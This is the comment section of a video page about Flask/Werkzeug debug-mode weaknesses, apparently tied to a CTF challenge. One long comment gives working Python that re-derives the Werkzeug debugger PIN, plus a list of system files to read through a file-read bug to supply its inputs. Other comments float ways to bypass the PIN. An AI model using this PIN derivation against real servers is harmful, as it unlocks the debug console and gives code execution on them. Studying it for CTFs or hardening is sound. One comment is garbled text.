DANGEROUS Python Flask Debug Mode Vulnerabilities
- Published: 10 Sep 2024
- Snyk is the sponsor for this video and deserves some love, try it out to find vulnerabilities in your own applications! j-h.io/snyk
sneak hm...snük
This one really hits home because I use flask for most my projects.
A # in a URL is a page anchor. Like for a long webpage, clicking the link will jump to a specific section of the webpage. It's ignored for the actual file retrieval portion of the request.
Fun fact, it's client-side only. This is how sites like Mega and Wormhole can include encryption keys in links that never get sent to the server (provided the JavaScript on the page is safe).
Yeah this is extremely DANGEROUS - by the way, doors are very unsafe, too. If you leave them open, any burglar can simply walk right into your house. Scandal!
Yes! The Legend!! :D Interesting with the debug mode.. Heard of it in Flask but never encountered it :)
I'm actually curious; if we have arbitrary file read, can't we read the stdout or stderr of the flask server and get the PIN from /proc/self/fd/{1,2} instead?
Update: we probably cannot do that because the process is still running and the stdout stream is not terminated by an EOF, which means that when the file is being read, it's likely gonna wait for the EOF, but that will never happen until the process terminates, so the request hangs.
Depends on if and when the program flushes the buffer. Take tail -f for example.
@@seanvinsick5271 true, someone should patch the `flask run` command to flush stderr after it prints the pin..
Your videos improved a lot. I like that you are straightforward on what's really going on.
Thanks !
The bit after # in a URL is called a fragment.
Hey John, just wanted to say one thing that the snake in the thumbnail is not python but a bush viper.
unwatchable
Thanks John ! Just realized I miss your old outro music so I went to some previous video and enjoyed 😛
by any ans, but I can make what I envision, and that's the greatest gift to . You are, without a doubt, an expert teacher. You may
That was very cool John!! I am working on a Flask for Python web app. This video gave me great insight in some security issues! Thanks!
Cool.. what web app are you building?
Awesome... enjoyed this.... starting to understand more of your hacks as I learn about building web apps
Interesting
big fan from NetworkChuck
12:58 You could try if the console is already usable while just hidden behind the PIN because it's rendered, so maybe if you just remove the pin input popup from the DOM you could use the console?
tried it and it for some reason just shows the 404 error thing whenever you try something
and when you have a page called console it'll show what you made that do
Love love love the clear video quality and content
You're next level bro
Awesome video. I am making a flask app exploitation tool and I will add that for sure.
Nice learning some new python tricks :D
I honestly only use flask as the python equivalent to express, make rest api's or websocket servers, backend stuff, but always turn off debug mode in prod
How can I find the docker image please 💜
Why isn't the debug pin just a random number? Trying to be too clever?
Nice one John and thank you for this content.
Short and easy thank you
There are more than 10 users on my machine; how can I see which one runs the script?
the /proc and /sys folders almost look like magic
Why don't you shorten the URL (valid SSL, as it will use that shortener's SSL) and put your payload in the shortener??? How's that gonna work out?
@@priyapepsi It will redirect it immediately to the local service ,try it.
Thank you John Hammond I will have checked out my python in learning this and have I got the right hack the Box I can't get it to Lead the first time and when it does it doesn't look right
"John... John!! I can't get Jurassic Park back online without Dennis Nedry." 💻🖥🚨⚡⚡🦎🦕🦖
Vulnerabilites? In debug mode? Who would have thought of that... SAID NO ONE!!!!
I'm confused about a day. with this encoding stuff and keys.
I'm stuck on htb agile in this part😮
💜Jhon Hammond 💙
Big fan sir
John Hammond: Do you have any idea why people found your challenge hard? I for one don't know much about all those things about the /proc file system, for example.
Great video!
From which website can I download this wokerbee docker file??
that video is sooo cool :)
Can you search for this with shodan?
Hey John, please, reduce the brightness of your screen! It will damage your eyes.
"tack tack SSL"
... Did you happen to play EVE online at some point?
👍👍John!
😍
This will almost never happen with Blazor...Because C# leaves less open doors to vulnerabilities in the code.
..my opinion of course...lol
I exploited this misconfiguration months ago lol. Has this "vulnerability" only now been officially discovered? Because if that's the case, I discovered it months ago first.
He said in the beginning that this is from a CTF he made a while ago.
@@WashingtonFernandes oh True
There are a few blogs demonstrating this dating back to 2020, cool how this can be done.
I think this is already patched in python 3.9 and the new flask version, the pin reverse engineering script is not working
lmao yeah, makes sense that the Flask people won't just let a vulnerability hang in there for too long
Sabari inn more information on this video
What's updog?
Wow, this looked like a really fun challenge! I should get into doing more CTF stuff. I did picoCTF back in 2019 at my high school, and it was an absolute blast! (I had the highest score out of my entire school, which I'm proud of; binary exploitation, web exploitation, and the steganography challenges were my favorite.)
Just telling u went to tor to search but everything is all on the open web
first
Literally doesn't care.
I'm getting 2 different machine IDs:
machine-id = 43c2ab1e-6cbd-4642-a70b-cbcfe418d38a # /proc/sys/kernel/random/boot_id
machine-id2 = ed5b159560f54721827644bc9b220d00 #/etc/machine-id
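For anyone wondering which of those two IDs actually feeds into the PIN: the following is an added worked example, not code from the video or from Werkzeug itself. It re-derives the debugger PIN and console cookie name the way `werkzeug.debug.get_pin_and_cookie_name()` and its Linux `get_machine_id()` helper do in recent, SHA-1-based Werkzeug releases (older releases hashed with MD5 and did not append the cgroup suffix, which is one reason an older PIN script stops matching; check the source of the version installed on the target). Werkzeug tries `/etc/machine-id` first and only falls back to `/proc/sys/kernel/random/boot_id` when that is missing or empty, then appends the last path component of the first line of `/proc/self/cgroup`. The username, module path, MAC address and cgroup line below are constructed sample values; the two IDs are the ones from the comment above.

```python
"""Re-derivation of the Werkzeug debugger PIN from its inputs (example code,
mirroring werkzeug.debug as found in SHA-1-based releases; verify against the
installed version). All sample values are constructed for this example."""
import hashlib
from itertools import chain


def linux_machine_id(machine_id_file, boot_id_file, cgroup_file):
    """Assemble the 'machine id' bytes the way Werkzeug does on Linux.

    Each argument is the raw content of the corresponding file, or None if
    the file could not be opened:
      machine_id_file -> /etc/machine-id                   (tried first)
      boot_id_file    -> /proc/sys/kernel/random/boot_id   (fallback only)
      cgroup_file     -> /proc/self/cgroup (last '/' part of line 1 is appended)
    Only the first non-empty id is used, so on a normal host /etc/machine-id wins.
    """
    linux = b""
    for content in (machine_id_file, boot_id_file):
        if content is None:
            continue
        value = content.split(b"\n", 1)[0].strip()  # same as f.readline().strip()
        if value:
            linux += value
            break
    if cgroup_file is not None:
        first_line = cgroup_file.split(b"\n", 1)[0].strip()
        linux += first_line.rpartition(b"/")[2]  # e.g. the container id, or b"" for "0::/"
    return linux


def werkzeug_pin_and_cookie(username, modname, appname, modfile, mac_decimal, machine_id):
    """Return (pin, cookie_name) from the 'probably public' and 'private' bits.

    username    - getpass.getuser() on the server
    modname     - app.__module__, "flask.app" for a Flask app
    appname     - getattr(app, "__name__", type(app).__name__), "Flask" for Flask
    modfile     - sys.modules[modname].__file__, i.e. the path to flask/app.py
    mac_decimal - str(uuid.getnode()): the MAC address as a decimal integer string
    machine_id  - bytes from linux_machine_id()
    """
    probably_public_bits = [username, modname, appname, modfile]
    private_bits = [mac_decimal, machine_id]
    h = hashlib.sha1()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode("utf-8")
        h.update(bit)
    h.update(b"cookiesalt")
    cookie_name = f"__wzd{h.hexdigest()[:20]}"
    h.update(b"pinsalt")  # the hash state carries on from the cookie computation
    num = f"{int(h.hexdigest(), 16):09d}"[:9]
    for group_size in (5, 4, 3):  # 9 digits -> groups of 3, i.e. XXX-XXX-XXX
        if len(num) % group_size == 0:
            pin = "-".join(num[x:x + group_size].rjust(group_size, "0")
                           for x in range(0, len(num), group_size))
            break
    else:
        pin = num
    return pin, cookie_name


def example_pin():
    """Worked example: a Flask app run as root inside a container (constructed values)."""
    machine_id = linux_machine_id(
        b"ed5b159560f54721827644bc9b220d00\n",       # /etc/machine-id (used)
        b"43c2ab1e-6cbd-4642-a70b-cbcfe418d38a\n",   # boot_id (ignored: machine-id present)
        b"0::/docker/4f1e2d3c4b5a6978\n",             # /proc/self/cgroup, constructed
    )
    return werkzeug_pin_and_cookie(
        username="root",
        modname="flask.app",
        appname="Flask",
        modfile="/usr/local/lib/python3.11/site-packages/flask/app.py",  # assumed path
        mac_decimal=str(0x0242AC110002),  # uuid.getnode() for 02:42:ac:11:00:02
        machine_id=machine_id,
    )


if __name__ == "__main__":
    print(example_pin())
```

With an arbitrary file read, the inputs you still need from the target are the username (e.g. from `/proc/self/status` or `/etc/passwd` and the process environment), the Flask install path (from `/proc/self/maps` or `sys.path` guesses), the MAC (`/sys/class/net/<iface>/address`) and the three machine-id files above. The cookie name is worth checking first: the `__wzd…` cookie the debugger sets in the browser must match the one you compute, otherwise one of the inputs is wrong and the PIN will be too.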
I don't even have 2 months of learning to hack, but after learning XSS I realized that if Python can build a website then it can definitely come with so many more bugs.... this is a confirmation for me that I am on the right path in hacking.... CURIOSITY_IS_THE_LEADER_IN_HACKING